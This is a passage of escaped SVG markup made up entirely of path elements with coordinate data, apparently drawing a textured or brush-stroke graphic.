d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1